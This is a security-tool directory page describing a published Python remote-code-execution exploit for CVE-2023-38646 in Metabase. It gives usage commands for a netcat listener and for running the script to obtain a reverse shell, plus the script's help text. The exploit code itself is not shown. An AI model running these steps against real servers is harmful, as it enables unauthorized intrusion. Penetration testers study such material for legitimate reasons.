Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-38646 — RCE Exploit for CVE-2023-38646 | Kitploit
Tools/GitHubGitHub/anvithlobo/cve-2023-38646
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubanvithlobo/cve-2023-38646

CVE-2023-38646

RCE Exploit for CVE-2023-38646

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-38646

A python RCE exploit for CVE-2023-38646

Usage

Start a Listner

root@kitploit:~
nc -lvnp <port>

Run the exploit

root@kitploit:~
python3 CVE-2023-38646.py -u <metabase_url> -l <local_ip> -p <local_port>

Help

root@kitploit:~
python3 CVE-2023-38646.py -h

usage: CVE-2023-38646.py [-h] -u URL -l LHOST -p LPORT

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL to exploit (root path for metabase)
  -l LHOST, --lhost LHOST
                        LHOST for reverse shell
  -p LPORT, --lport LPORT
                        LPORT for reverse shell

Download Tool